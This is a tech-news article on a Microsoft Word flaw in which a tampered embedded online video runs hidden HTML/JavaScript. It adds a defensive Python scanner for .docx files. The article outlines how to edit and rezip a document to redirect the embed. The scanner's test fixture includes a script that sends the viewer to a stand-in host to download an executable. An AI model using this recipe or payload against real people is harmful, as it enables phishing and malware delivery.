Watch Out! Embedded Microsoft Word Videos Could Infect Your PC

There seems to be a serious security flaw in Microsoft Word that Microsoft doesn't want to fix.

Credit: Pathdoc/Shutterstock

In a blog post yesterday (Oct. 25), Israeli security firm Cymulate showed how the XML describing an online video embedded in a Word document can be altered so that clicking the video runs attacker-supplied HTML and JavaScript instead of simply playing the clip.

"Attackers could use this for malicious purposes such as phishing, as the document will show the embedded online video with a link to YouTube, while disguising a hidden HTML/JavaScript code that will be running in the background and could potentially lead to further code execution scenarios," Cymulate Chief Technology Officer Avihai Ben-Yossef said in the company blog post.

In other words, phishers and scammers could abuse this flaw by attaching booby-trapped Word documents, disguised as invoices or resumes, to emails sent to hapless recipients.

We reached out to Microsoft for comment and received this statement attributed to Jeff Jones, a senior director at Microsoft: "The product is properly interpreting html as designed — working in the same manner as similar products."

That may be accurate, but we're not sure it helps. In the meantime, you can protect yourself by not clicking the play button on any video embedded in a Word document you didn't expect to receive: the document looks harmless until that click, because the hidden code is only run when the video is activated. A good antivirus program might also be able to detect and stop whatever the hidden code tries to download if you do end up clicking the video.

The issue exists partly because modern Word documents, the ".docx" files of the Office Open XML format, are written in XML, a text markup language that is a close cousin of the HTML used to build web pages.

Like web pages, Word documents can have supporting files that store the data needed to present the finished document, and a .docx file is really just a compressed (ZIP) bundle of all those files.

Here's a fun thing to do. Find a .docx file on your machine you don't really need anymore. Right-click its name and change the extension from ".docx" to ".zip". (If you don't see the extension, turn on "File name extensions" in the View tab of File Explorer first.) Hit Enter to save the change, then right-click the file again and select "Extract All".

Windows will extract all the files in the Word document to a new folder, which will contain more folders with names such as "_rels", "word" and "theme", as well as files named "document.xml", "fontTable.xml", "settings.xml" and so on. (Most of these live inside the "word" folder.)

The "document.xml" file is the one that matters. Open it in a text editor such as Notepad and you'll see a whole lot of apparent gibberish, with the actual text of the Word document barely discernible. That gibberish is XML markup, which tells Word how the text is to be laid out and what objects (pictures, videos and so on) appear alongside it.

If you have a web-based video, such as one from YouTube, embedded in the Word document, the video's embed code, including its URL, will appear in the document.xml file as an escaped snippet of HTML stored inside one of those XML attributes.

The thing is, nothing in the .docx format stops you from editing those parts. After all, it's your file. So, Cymulate says, you can go into the document.xml file, change the HTML relating to the embedded video to point to something malicious, such as an online malware repository that will push nasty stuff onto a computer, save the document.xml file, rebundle all the files into a .docx file and send it on its way. (When rezipping, you have to compress the contents of the extracted folder, not the folder itself, so that "[Content_Types].xml" sits at the root of the archive; otherwise Word won't open the result.)
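
Here is a way to do the unzip-and-look procedure above in code, and to check what an embedded video actually contains without opening the document in Word. This is an added example, not Cymulate's tool and not code from the article. It assumes, following Cymulate's description, that Word stores an Insert > Online Video object as an attribute named embeddedHtml holding the escaped HTML embed snippet (the element's namespace prefix is ignored so the check does not depend on it); the list of "allowed" video hosts and the sample documents are our own constructions.

```python
"""Inspect the online-video objects inside a .docx without opening it in Word.

Added example (not Cymulate's tool and not code from the article). Assumption:
Word stores an Insert > Online Video object as an attribute named embeddedHtml
carrying the escaped HTML embed snippet; the element's namespace prefix is
ignored. The sample documents below are constructed in memory.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse
from xml.sax.saxutils import escape

# Hosts a legitimate "Online Video" embed is expected to point at (assumption).
ALLOWED_VIDEO_HOSTS = {"www.youtube.com", "www.youtube-nocookie.com", "player.vimeo.com"}

TAG_RE = re.compile(r"<\s*/?\s*([A-Za-z][\w-]*)")
EVENT_HANDLER_RE = re.compile(r"\bon[a-z]+\s*=", re.I)
SRC_RE = re.compile(r'\bsrc\s*=\s*"([^"]*)"', re.I)


def extract_embedded_html(docx_bytes):
    """Unzip the .docx in memory and return every embeddedHtml value found in
    its word/*.xml parts (body, headers and footers alike) as (part, html)."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            root = ET.fromstring(z.read(name))
            for el in root.iter():
                for attr, value in el.attrib.items():
                    # attr may be "{namespace}embeddedHtml"; compare the local name
                    if attr.rsplit("}", 1)[-1] == "embeddedHtml":
                        found.append((name, value))
    return found


def classify_embed(html):
    """Return "video" for a lone <iframe> with a single https src on an allowed
    host, otherwise "suspicious" (any other tag such as <script>, an event
    handler attribute, a javascript: URL, or a src pointing elsewhere)."""
    tags = {t.lower() for t in TAG_RE.findall(html)}
    if tags != {"iframe"}:
        return "suspicious"
    if EVENT_HANDLER_RE.search(html) or "javascript:" in html.lower():
        return "suspicious"
    srcs = SRC_RE.findall(html)
    if len(srcs) != 1:
        return "suspicious"
    url = urlparse(srcs[0])
    if url.scheme != "https" or url.hostname not in ALLOWED_VIDEO_HOSTS:
        return "suspicious"
    return "video"


def scan_docx(docx_bytes):
    """Return [(part, verdict, html), ...], one entry per embedded video object."""
    return [(part, classify_embed(html), html)
            for part, html in extract_embedded_html(docx_bytes)]


def build_docx(embedded_html):
    """Build a minimal, constructed .docx in memory carrying one online-video
    object. A real Word file has many more parts; only the two needed here
    are written, and the embed HTML is escaped into the attribute value the
    way it appears in document.xml."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:wp15="http://schemas.microsoft.com/office/word/2012/wordprocessingDrawing">'
        '<w:body><w:p><w:r><w:t>Invoice 4711 - please review the attached video</w:t></w:r></w:p>'
        '<w:p><w:r><w:drawing><wp15:webVideoPr embeddedHtml="'
        + escape(embedded_html, {'"': "&quot;"})
        + '" h="360" w="640"/></w:drawing></w:r></w:p></w:body></w:document>'
    )
    content_types = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        '</Types>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()


# Constructed samples: a genuine-looking YouTube embed, and the same embed
# with a script appended that would send the reader off to fetch a payload.
BENIGN_EMBED = ('<iframe width="640" height="360" '
                'src="https://www.youtube.com/embed/VIDEO_ID" frameborder="0" allowfullscreen></iframe>')
TAMPERED_EMBED = BENIGN_EMBED + '<script>window.location="https://payload.example.net/update.exe"</script>'

if __name__ == "__main__":
    for label, embed in (("benign", BENIGN_EMBED), ("tampered", TAMPERED_EMBED)):
        for part, verdict, html in scan_docx(build_docx(embed)):
            print(f"{label}: {part}: {verdict}: {html[:60]}...")
```

To check a real file, pass the bytes of the .docx to scan_docx(); anything that comes back "suspicious" deserves a look at the full HTML before the document is opened in Word. The classifier is deliberately strict: a legitimate embed is one iframe and nothing else, so any additional markup is treated as tampering rather than trying to decide whether that markup is harmful.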

This procedure didn't quite work for us when we tried to redirect an innocuous YouTube video in our own Word file, so we'll just have to trust Cymulate about this part.

And because Microsoft doesn't seem to have a fix in mind, we'll have to go with the advice the company's spokesman gave us: "We encourage customers to practice good computing habits online, including exercising caution when clicking on links or opening unknown files."

Paul Wagenseil

Paul Wagenseil is a senior editor at Tom's Guide focused on security and privacy. He has also been a dishwasher, fry cook, long-haul driver, code monkey and video editor. He's been rooting around in the information-security space for more than 15 years at FoxNews.com, SecurityNewsDaily, TechNewsDaily and Tom's Guide, has presented talks at the ShmooCon, DerbyCon and BSides Las Vegas hacker conferences, shown up in random TV news spots and even moderated a panel discussion at the CEDIA home-technology conference. You can follow his rants on Twitter at @snd_wagenseil.